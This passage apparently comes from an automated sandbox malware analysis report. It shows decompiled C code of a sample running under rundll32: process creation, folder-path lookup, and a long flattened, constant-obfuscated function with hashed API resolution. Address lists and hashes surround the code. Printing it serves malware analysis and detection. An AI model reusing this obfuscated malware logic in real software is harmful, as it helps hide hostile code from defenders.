				E01FF7378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}











                                                                      0x0200b876
                                                                      0x0200b87b
                                                                      0x0200b87d
                                                                      0x0200b87e
                                                                      0x0200b881
                                                                      0x0200b884
                                                                      0x0200b887
                                                                      0x0200b88a
                                                                      0x0200b88d
                                                                      0x0200b890
                                                                      0x0200b891
                                                                      0x0200b892
                                                                      0x0200b893
                                                                      0x0200b896
                                                                      0x0200b897
                                                                      0x0200b89a
                                                                      0x0200b89d
                                                                      0x0200b8a0
                                                                      0x0200b8a4
                                                                      0x0200b8a5
                                                                      0x0200b8aa
                                                                      0x0200b8bb
                                                                      0x0200b8c3
                                                                      0x0200b8c6
                                                                      0x0200b8ca
                                                                      0x0200b8d1
                                                                      0x0200b8d8
                                                                      0x0200b8df
                                                                      0x0200b8e6
                                                                      0x0200b8ed
                                                                      0x0200b8f1
                                                                      0x0200b8f4
                                                                      0x0200b8fb
                                                                      0x0200b902
                                                                      0x0200b909
                                                                      0x0200b928
                                                                      0x0200b942
                                                                      0x0200b949

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0200B942
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: f2a587d58244c9be459cf44d469b377bdf4ad0f5d92e2352495b40eda2cd12b4
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 0721C472800248BBEF159F95CD09CDFBFB9FF89714F408158FA1466260D7B69A60DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF471A, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 160 1ff471a-1ff47ea call 2002550 call 1ff7378 SHGetFolderPathW
                                                                      C-Code - Quality: 58%
                                                                      			E01FF471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E02002550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E01FF7378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}












                                                                      0x01ff473b
                                                                      0x01ff4740
                                                                      0x01ff474a
                                                                      0x01ff4753
                                                                      0x01ff475a
                                                                      0x01ff4761
                                                                      0x01ff4765
                                                                      0x01ff476f
                                                                      0x01ff4772
                                                                      0x01ff4775
                                                                      0x01ff477c
                                                                      0x01ff4788
                                                                      0x01ff4789
                                                                      0x01ff478e
                                                                      0x01ff4792
                                                                      0x01ff4799
                                                                      0x01ff47aa
                                                                      0x01ff47ad
                                                                      0x01ff47b4
                                                                      0x01ff47d3
                                                                      0x01ff47e4
                                                                      0x01ff47ea

                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 01FF47E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: 1a88c1d8ed51b6097d23ccce26c076287bbe3dadd5d3f1899b9891b62f7bab5b
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: A721F272D01218BBEF05DFE4C84A8DEBBB5EF05354F108089E924A6290D3B59B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 02005250, Relevance: 48.4, Strings: 38, Instructions: 936COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E02005250() {
				char _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				void* _v96;
				char _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				intOrPtr _v132;
				char _v140;
				void* _v148;
				char _v156;
				char _v160;
				char _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				unsigned int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				unsigned int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				unsigned int _v360;
				unsigned int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				unsigned int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				void* __ebx;
				intOrPtr _t927;
				intOrPtr _t947;
				signed int _t1117;
				signed int _t1118;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				signed int _t1126;
				signed int _t1127;
				signed int _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1135;
				signed int _t1136;
				signed int _t1137;
				signed int _t1138;
				signed int _t1143;
				void* _t1145;
				void* _t1148;
				void* _t1149;
				void* _t1150;

				_t1145 = (_t1143 & 0xfffffff8) - 0x220;
				_v72 = _v72 & 0x00000000;
				_v84 = 0x209410;
				_t1034 = 0x12e722cf;
				_v80 = 0x7fb3a;
				_v76 = 0x87a05;
				_v476 = 0x6f2d;
				_v476 = _v476 ^ 0x017c3002;
				_v476 = _v476 + 0xffffbd18;
				_v476 = _v476 | 0xc91499cd;
				_v476 = _v476 ^ 0xc97c9eea;
				_v280 = 0x77b6;
				_v280 = _v280 + 0x5656;
				_v280 = _v280 ^ 0x000089ef;
				_v380 = 0x736f;
				_v380 = _v380 << 2;
				_v380 = _v380 + 0x5e6a;
				_v380 = _v380 ^ 0x00026114;
				_v216 = 0xcbd1;
				_v216 = _v216 ^ 0x44eba388;
				_v216 = _v216 ^ 0x44eb05d5;
				_v296 = 0xc4c6;
				_v296 = _v296 + 0x2d2;
				_v296 = _v296 ^ 0x0000e1e8;
				_v288 = 0x42e8;
				_t1121 = 0x3f;
				_v288 = _v288 / _t1121;
				_v288 = _v288 ^ 0x00000dcd;
				_v244 = 0x282;
				_v244 = _v244 >> 6;
				_v244 = _v244 ^ 0x0000405b;
				_v252 = 0x771a;
				_v252 = _v252 >> 0xe;
				_v252 = _v252 ^ 0x00001031;
				_v492 = 0xf437;
				_v492 = _v492 >> 3;
				_t1122 = 0x61;
				_v492 = _v492 / _t1122;
				_v492 = _v492 + 0xffff3f4e;
				_v492 = _v492 ^ 0xffff2cd5;
				_v192 = 0x3176;
				_v192 = _v192 + 0x69b1;
				_v192 = _v192 ^ 0x0000ea14;
				_v420 = 0xc417;
				_v420 = _v420 + 0x8980;
				_v420 = _v420 ^ 0xd4e62d65;
				_v420 = _v420 ^ 0xd4e7684b;
				_v212 = 0x15f4;
				_v212 = _v212 * 0x22;
				_v212 = _v212 ^ 0x0002e648;
				_v456 = 0xe852;
				_v456 = _v456 >> 0xd;
				_v456 = _v456 + 0xffffcc84;
				_v456 = _v456 << 0xe;
				_v456 = _v456 ^ 0xf322a6d4;
				_v536 = 0x2d0a;
				_v536 = _v536 ^ 0xa9ca95e4;
				_v536 = _v536 * 0xe;
				_v536 = _v536 + 0xcaaf;
				_v536 = _v536 ^ 0x4916b696;
				_v224 = 0xd1a0;
				_v224 = _v224 >> 0xc;
				_v224 = _v224 ^ 0x00006736;
				_v184 = 0xb552;
				_v184 = _v184 ^ 0x240384b8;
				_v184 = _v184 ^ 0x24037a21;
				_v472 = 0x9384;
				_t1117 = 0x52;
				_v472 = _v472 / _t1117;
				_v472 = _v472 + 0x4a96;
				_v472 = _v472 ^ 0xcc9e8605;
				_v472 = _v472 ^ 0xcc9ec215;
				_v236 = 0x7622;
				_v236 = _v236 + 0xffff4cbc;
				_v236 = _v236 ^ 0xfffff78f;
				_v548 = 0xb822;
				_v548 = _v548 ^ 0x5a18f77c;
				_v548 = _v548 + 0xffff6a91;
				_t1123 = 6;
				_v548 = _v548 * 0x46;
				_v548 = _v548 ^ 0xa27cfa0f;
				_v428 = 0x9f04;
				_v428 = _v428 * 0x35;
				_v428 = _v428 + 0xde16;
				_v428 = _v428 ^ 0x0021bdfd;
				_v516 = 0xd39a;
				_v516 = _v516 / _t1123;
				_v516 = _v516 + 0x15af;
				_t1124 = 0x59;
				_v516 = _v516 / _t1124;
				_v516 = _v516 ^ 0x00007e9e;
				_v308 = 0xa16d;
				_v308 = _v308 + 0xe711;
				_v308 = _v308 + 0xffff4f28;
				_v308 = _v308 ^ 0x00009f4e;
				_v532 = 0x7266;
				_t1125 = 0x28;
				_v532 = _v532 / _t1125;
				_v532 = _v532 * 0x3d;
				_v532 = _v532 ^ 0xce065b2a;
				_v532 = _v532 ^ 0xce06dfd5;
				_v196 = 0x1672;
				_v196 = _v196 + 0xa446;
				_v196 = _v196 ^ 0x0000d90c;
				_v220 = 0xe32f;
				_v220 = _v220 << 6;
				_v220 = _v220 ^ 0x00389c68;
				_v432 = 0x625c;
				_v432 = _v432 + 0xffff71ce;
				_v432 = _v432 * 0x56;
				_v432 = _v432 + 0xffffa9e5;
				_v432 = _v432 ^ 0xfff0dd97;
				_v336 = 0xeda0;
				_v336 = _v336 + 0xeb07;
				_v336 = _v336 ^ 0x0001d4cc;
				_v272 = 0xcc88;
				_v272 = _v272 | 0x5dccb544;
				_v272 = _v272 ^ 0x5dccc982;
				_v352 = 0xf44c;
				_v352 = _v352 + 0xc438;
				_v352 = _v352 + 0xffff921a;
				_v352 = _v352 ^ 0x000119bf;
				_v500 = 0x896b;
				_v500 = _v500 + 0xffff320f;
				_v500 = _v500 << 2;
				_v500 = _v500 + 0x6054;
				_v500 = _v500 ^ 0xffff256a;
				_v468 = 0xb0db;
				_v468 = _v468 + 0x1d7c;
				_t1126 = 0x7c;
				_v468 = _v468 * 0x18;
				_v468 = _v468 / _t1126;
				_v468 = _v468 ^ 0x0000431a;
				_v384 = 0x26f0;
				_v384 = _v384 ^ 0x045f799c;
				_v384 = _v384 ^ 0x3dddf456;
				_v384 = _v384 ^ 0x39829c32;
				_v176 = 0xf7b7;
				_v176 = _v176 + 0x6391;
				_v176 = _v176 ^ 0x00016a08;
				_v248 = 0xecad;
				_v248 = _v248 + 0xffff796a;
				_v248 = _v248 ^ 0x00007c9b;
				_v376 = 0xe362;
				_v376 = _v376 + 0xffffce79;
				_t1127 = 0x13;
				_v376 = _v376 * 0x72;
				_v376 = _v376 ^ 0x004f6c3e;
				_v436 = 0x3eeb;
				_v436 = _v436 >> 7;
				_v436 = _v436 ^ 0x17e78ab4;
				_v436 = _v436 | 0x5631ea9d;
				_v436 = _v436 ^ 0x57f78106;
				_v344 = 0xfafb;
				_v344 = _v344 | 0xa088f90b;
				_v344 = _v344 << 4;
				_v344 = _v344 ^ 0x088fad6b;
				_v424 = 0xd20d;
				_v424 = _v424 | 0x976e33e5;
				_v424 = _v424 / _t1117;
				_v424 = _v424 ^ 0x01d88155;
				_v368 = 0xb305;
				_v368 = _v368 >> 4;
				_v368 = _v368 * 0x6f;
				_v368 = _v368 ^ 0x0004dd79;
				_v312 = 0x6c6e;
				_v312 = _v312 | 0x7aa669f9;
				_v312 = _v312 / _t1127;
				_v312 = _v312 ^ 0x0674fe9a;
				_v304 = 0x37ec;
				_v304 = _v304 ^ 0xd9da6a19;
				_v304 = _v304 ^ 0xd9da0267;
				_v408 = 0x189;
				_v408 = _v408 >> 3;
				_v408 = _v408 ^ 0x76db6b00;
				_v408 = _v408 ^ 0x76db7e0a;
				_v328 = 0xb7d;
				_v328 = _v328 ^ 0xd2ca4f28;
				_v328 = _v328 | 0x13588259;
				_v328 = _v328 ^ 0xd3da9a47;
				_v264 = 0xf9f8;
				_v264 = _v264 >> 0xc;
				_v264 = _v264 ^ 0x000003c9;
				_v256 = 0xc1c3;
				_v256 = _v256 + 0x1be1;
				_v256 = _v256 ^ 0x0000cdde;
				_v200 = 0x3e85;
				_t1128 = 0x76;
				_v200 = _v200 / _t1128;
				_v200 = _v200 ^ 0x000018d1;
				_v528 = 0x6317;
				_v528 = _v528 + 0x6e33;
				_v528 = _v528 << 0xa;
				_t1129 = 0x38;
				_v528 = _v528 / _t1129;
				_v528 = _v528 ^ 0x000eeaa2;
				_v180 = 0x5a91;
				_v180 = _v180 << 0x10;
				_v180 = _v180 ^ 0x5a913d65;
				_v484 = 0x2725;
				_v484 = _v484 >> 0xf;
				_v484 = _v484 + 0xffffcf28;
				_t1130 = 0x7f;
				_v484 = _v484 * 0x56;
				_v484 = _v484 ^ 0xffefd6a2;
				_v508 = 0xdc7;
				_v508 = _v508 * 0x18;
				_v508 = _v508 + 0xd9f6;
				_v508 = _v508 | 0xcb6e322e;
				_v508 = _v508 ^ 0xcb6e2f09;
				_v232 = 0xca01;
				_v232 = _v232 + 0xffff5b75;
				_v232 = _v232 ^ 0x0000641b;
				_v168 = 0x16fe;
				_v168 = _v168 ^ 0x17eb1dda;
				_v168 = _v168 ^ 0x17eb32d1;
				_v340 = 0xdfb5;
				_v340 = _v340 + 0xfffffcd7;
				_v340 = _v340 << 6;
				_v340 = _v340 ^ 0x00376540;
				_v260 = 0xf92f;
				_v260 = _v260 | 0xacfe7636;
				_v260 = _v260 ^ 0xacfe9e8f;
				_v348 = 0x96d2;
				_v348 = _v348 | 0x1aa809e7;
				_v348 = _v348 ^ 0x05f39991;
				_v348 = _v348 ^ 0x1f5b5d0b;
				_v396 = 0x247f;
				_v396 = _v396 ^ 0xf1f26a5d;
				_v396 = _v396 + 0xf16a;
				_v396 = _v396 ^ 0xf1f369c0;
				_v404 = 0xf1e8;
				_v404 = _v404 ^ 0x0fadedaf;
				_v404 = _v404 + 0x5347;
				_v404 = _v404 ^ 0x0fad279d;
				_v240 = 0x676b;
				_v240 = _v240 ^ 0xc965c134;
				_v240 = _v240 ^ 0xc965c068;
				_v412 = 0xa09f;
				_v412 = _v412 + 0xffff772a;
				_v412 = _v412 + 0xe197;
				_v412 = _v412 ^ 0x0000ae26;
				_v520 = 0xecbc;
				_v520 = _v520 + 0x348e;
				_v520 = _v520 / _t1130;
				_v520 = _v520 * 0x6f;
				_v520 = _v520 ^ 0x0000e534;
				_v284 = 0x3f47;
				_t455 =  &_v284; // 0x3f47
				_v284 =  *_t455 * 0x25;
				_v284 = _v284 ^ 0x00095ce6;
				_v276 = 0x6631;
				_v276 = _v276 | 0xb06bbfe9;
				_v276 = _v276 ^ 0xb06bf800;
				_v504 = 0x8c83;
				_v504 = _v504 * 0x5b;
				_v504 = _v504 * 0x3e;
				_v504 = _v504 >> 6;
				_v504 = _v504 ^ 0x00301e3a;
				_v488 = 0x4309;
				_v488 = _v488 >> 0xf;
				_t1131 = 0x58;
				_v488 = _v488 / _t1131;
				_v488 = _v488 + 0x27af;
				_v488 = _v488 ^ 0x000009a7;
				_v364 = 0xa96;
				_v364 = _v364 << 7;
				_v364 = _v364 >> 7;
				_v364 = _v364 ^ 0x00003920;
				_v480 = 0x9f6;
				_t1132 = 0x6b;
				_v480 = _v480 / _t1132;
				_v480 = _v480 << 0xd;
				_v480 = _v480 + 0xffff43ca;
				_v480 = _v480 ^ 0x00025c77;
				_v416 = 0xe237;
				_v416 = _v416 + 0xffff63bb;
				_v416 = _v416 + 0xffff2499;
				_v416 = _v416 ^ 0xffff6d1e;
				_v188 = 0x6325;
				_v188 = _v188 | 0xc894d050;
				_v188 = _v188 ^ 0xc8949af4;
				_v360 = 0xe854;
				_v360 = _v360 >> 5;
				_v360 = _v360 >> 4;
				_v360 = _v360 ^ 0x00006280;
				_v400 = 0x8eca;
				_v400 = _v400 << 7;
				_t1133 = 0x6d;
				_v400 = _v400 * 0x4b;
				_v400 = _v400 ^ 0x14eae0d6;
				_v228 = 0x2866;
				_v228 = _v228 + 0x1bda;
				_v228 = _v228 ^ 0x00005064;
				_v332 = 0x7acf;
				_v332 = _v332 + 0xffffa705;
				_v332 = _v332 + 0xffffeb79;
				_v332 = _v332 ^ 0x00001fe4;
				_v544 = 0x2e82;
				_v544 = _v544 ^ 0xbb465bc8;
				_v544 = _v544 << 0x10;
				_v544 = _v544 << 9;
				_v544 = _v544 ^ 0x94006b8d;
				_v172 = 0xf8c0;
				_v172 = _v172 + 0xffff4f46;
				_v172 = _v172 ^ 0x00007ce0;
				_v524 = 0xd322;
				_v524 = _v524 | 0x4cafabc6;
				_v524 = _v524 ^ 0x09010195;
				_v524 = _v524 + 0xb84e;
				_v524 = _v524 ^ 0x45afae17;
				_v444 = 0xdf24;
				_v444 = _v444 << 0xf;
				_v444 = _v444 * 0x7f;
				_v444 = _v444 * 0x51;
				_v444 = _v444 ^ 0x4bce658a;
				_v292 = 0x8547;
				_v292 = _v292 | 0x64a73ebc;
				_v292 = _v292 ^ 0x64a7de76;
				_v300 = 0x1ce8;
				_v300 = _v300 + 0xdb70;
				_v300 = _v300 ^ 0x0000b072;
				_v392 = 0x566a;
				_v392 = _v392 | 0x5a1da982;
				_v392 = _v392 ^ 0x760ad9ea;
				_v392 = _v392 ^ 0x2c170a90;
				_v452 = 0x771c;
				_v452 = _v452 / _t1133;
				_v452 = _v452 ^ 0xe02fadbb;
				_v452 = _v452 ^ 0xb094793c;
				_v452 = _v452 ^ 0x50bb905c;
				_v204 = 0xb4fc;
				_t1134 = 0x63;
				_v204 = _v204 * 0x11;
				_v204 = _v204 ^ 0x000c0424;
				_v440 = 0x57e7;
				_v440 = _v440 | 0xebefe10d;
				_t614 =  &_v440; // 0xebefe10d
				_t1135 = 0x14;
				_v440 =  *_t614 / _t1134;
				_v440 = _v440 / _t1135;
				_v440 = _v440 ^ 0x001e9b30;
				_v540 = 0x534c;
				_v540 = _v540 | 0xac4af998;
				_v540 = _v540 + 0xffff4dfb;
				_v540 = _v540 + 0xffffb0a1;
				_v540 = _v540 ^ 0xac498cbf;
				_v460 = 0x841e;
				_v460 = _v460 + 0x9fac;
				_v460 = _v460 ^ 0x2c3ea9f2;
				_v460 = _v460 ^ 0xceb30bb3;
				_v460 = _v460 ^ 0xe28ccd4f;
				_v448 = 0xa9f1;
				_v448 = _v448 << 0xe;
				_v448 = _v448 + 0x33e0;
				_t1136 = 0x50;
				_v448 = _v448 * 0xe;
				_v448 = _v448 ^ 0x52ce0554;
				_v316 = 0x479e;
				_v316 = _v316 + 0x2801;
				_v316 = _v316 * 0x3d;
				_v316 = _v316 ^ 0x001a91ff;
				_v464 = 0x359e;
				_v464 = _v464 ^ 0x5af2d531;
				_v464 = _v464 ^ 0x9823c549;
				_v464 = _v464 + 0xffffa5a2;
				_v464 = _v464 ^ 0xc2d0cb88;
				_v388 = 0x481d;
				_v388 = _v388 + 0xffff5910;
				_v388 = _v388 << 0xb;
				_v388 = _v388 ^ 0xfc3d09c8;
				_v324 = 0x8018;
				_v324 = _v324 + 0xd377;
				_v324 = _v324 << 2;
				_v324 = _v324 ^ 0x0005594c;
				_v512 = 0xfb10;
				_v512 = _v512 + 0xffff4579;
				_v512 = _v512 + 0xffff9736;
				_v512 = _v512 + 0xffff5835;
				_v512 = _v512 ^ 0xffff2ff5;
				_v208 = 0x364e;
				_v208 = _v208 ^ 0x8963ea5d;
				_v208 = _v208 ^ 0x8963d3b3;
				_v320 = 0x9607;
				_v320 = _v320 << 5;
				_v320 = _v320 | 0x1731ff4b;
				_v320 = _v320 ^ 0x1733e0ab;
				_v372 = 0x6e21;
				_v372 = _v372 | 0x9eeaeff3;
				_v372 = _v372 ^ 0x9ee75453;
				_v496 = 0x9db4;
				_v496 = _v496 * 0x4c;
				_v496 = _v496 ^ 0x6ed3af11;
				_v496 = _v496 / _t1136;
				_v496 = _v496 ^ 0x016ddf0e;
				_v268 = 0x5783;
				_t1137 = 0x22;
				_t1118 = _v336;
				_v268 = _v268 * 0x77;
				_v268 = _v268 ^ 0x0028a245;
				_v356 = 0xa4f9;
				_v356 = _v356 >> 0xa;
				_t1138 = _v336;
				_v356 = _v356 / _t1137;
				_v356 = _v356 ^ 0x00001f41;
				while(1) {
					L1:
					_t927 = 0xd2c2d4a;
					do {
						while(1) {
							L2:
							_t1148 = _t1034 - 0x1ccb6601;
							if(_t1148 > 0) {
								break;
							}
							if(_t1148 == 0) {
								__eflags = E01FF5F04();
								if(__eflags == 0) {
									E0200939E();
									asm("sbb ecx, ecx");
									_t1034 = (_t1034 & 0x13a1ab3e) + 0x11e6b71b;
								} else {
									E0200939E();
									asm("sbb ecx, ecx");
									_t1034 = (_t1034 & 0x265cbaf4) + 0xfb8ec94;
								}
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							_t1149 = _t1034 - _t927;
							if(_t1149 > 0) {
								__eflags = _t1034 - 0x11e6b71b;
								if(__eflags > 0) {
									__eflags = _t1034 - 0x12e722cf;
									if(__eflags == 0) {
										_t1034 = 0xc5704d6;
										continue;
									}
									__eflags = _t1034 - 0x16840c8b;
									if(__eflags == 0) {
										_push( &_v160);
										_v164 = E0200A966(_v500, _v468, __eflags, _t1034, _v384, _v176);
										E02004A9E(_v376, __eflags,  &_v164, _v436, _v500, _v344);
										_t1115 = _v368;
										E02000D6D(_v424, _v368, _v312, _v164);
										_t1145 = _t1145 + 0x28;
										_t1034 = 0x435e806;
										while(1) {
											L1:
											_t927 = 0xd2c2d4a;
											goto L2;
										}
									}
									__eflags = _t1034 - 0x17da8405;
									if(_t1034 == 0x17da8405) {
										__eflags = E02004C37( &_v68, _v328, _v264);
										if(__eflags == 0) {
											L14:
											_t1034 = 0x27e8449b;
											while(1) {
												L1:
												_t927 = 0xd2c2d4a;
												goto L2;
											}
										}
										_t1115 = _v256;
										_v128 =  &_v68;
										_v124 = E01FF37A2( &_v68, _v256, _v200);
										_t1034 = 0x25120b57;
										while(1) {
											L1:
											_t927 = 0xd2c2d4a;
											goto L2;
										}
									}
									__eflags = _t1034 - 0x17df5ed7;
									if(_t1034 != 0x17df5ed7) {
										goto L105;
									}
									_v116 = E02001DFE(_t1115);
									_t1034 = 0x1f9ed57a;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								if(__eflags == 0) {
									E01FFE612();
									_t1034 = 0x2bcd9dcd;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0xda73f77;
								if(_t1034 == 0xda73f77) {
									_t1115 = _v104;
									E01FFDE81(_v392, _v104, _v452);
									L40:
									_t1034 = 0x6c42b3e;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0xfb8ec94;
								if(_t1034 == 0xfb8ec94) {
									E01FFA2D2();
									_t1034 = 0x24a19024;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0xfc71b8b;
								if(_t1034 == 0xfc71b8b) {
									E01FF5DE0();
									_t1034 = 0x3423e013;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0x104daaf6;
								if(__eflags != 0) {
									goto L105;
								}
								_t1138 = 0x17da8405;
								_t1118 = E01FFDF8A(_t1034, _t1115, __eflags, _v320, _v208);
								goto L40;
							}
							if(_t1149 == 0) {
								_t927 = E01FFC364();
								L110:
								return _t927;
							}
							_t1150 = _t1034 - 0x8331fa3;
							if(_t1150 > 0) {
								__eflags = _t1034 - 0x8e3e7b7;
								if(_t1034 == 0x8e3e7b7) {
									__eflags = E01FFBB96(_v416,  &_v148,  &_v140, _v188);
									if(__eflags == 0) {
										L94:
										_t1034 = 0x21dc4a65;
										while(1) {
											L1:
											_t927 = 0xd2c2d4a;
											goto L2;
										}
									}
									E0200021C();
									__eflags = _v132;
									_t1034 = 0xfc71b8b;
									if(__eflags == 0) {
										while(1) {
											L1:
											_t927 = 0xd2c2d4a;
											goto L2;
										}
									}
									__eflags = _v132 - 7;
									_t927 = 0xd2c2d4a;
									_t1034 =  ==  ? 0xd2c2d4a : 0xfc71b8b;
									continue;
								}
								__eflags = _t1034 - 0x90774b6;
								if(_t1034 == 0x90774b6) {
									E01FF4D90();
									E0200939E();
									asm("sbb ecx, ecx");
									_t1034 = (_t1034 & 0xc99f24de) + 0x3954b45a;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0xbc2d3ff;
								if(_t1034 == 0xbc2d3ff) {
									_t927 = E01FFA821();
									__eflags = _t927;
									if(_t927 == 0) {
										goto L110;
									}
									E01FF2200(_v288);
									_t1034 = 0x2ec155bf;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0xc5704d6;
								if(__eflags != 0) {
									goto L105;
								}
								_t927 = E02000E6B(_t1034, __eflags);
								__eflags = _t927;
								if(__eflags == 0) {
									goto L110;
								}
								_t1034 = 0x447f870;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							if(_t1150 == 0) {
								E01FFDE81(_v524, _v156, _v444);
								_t1034 = 0x23cd63af;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							if(_t1034 == 0x2f3d938) {
								E01FF1806();
								_t1034 = 0x3954b45a;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							if(_t1034 == 0x435e806) {
								_t1034 = 0x104daaf6;
								continue;
							}
							if(_t1034 == 0x447f870) {
								E01FFEA16(0x1e95092c);
								_t1034 = 0xbc2d3ff;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							if(_t1034 == 0x5a723c8) {
								_v120 = E01FF3FAF();
								_t1034 = 0x17df5ed7;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							_t1155 = _t1034 - 0x6c42b3e;
							if(_t1034 != 0x6c42b3e) {
								goto L105;
							}
							if(E02004F04(_t1155, _t1118) == 0) {
								_t1034 = _t1138;
								L104:
								_t927 = 0xd2c2d4a;
								goto L105;
							}
							goto L14;
						}
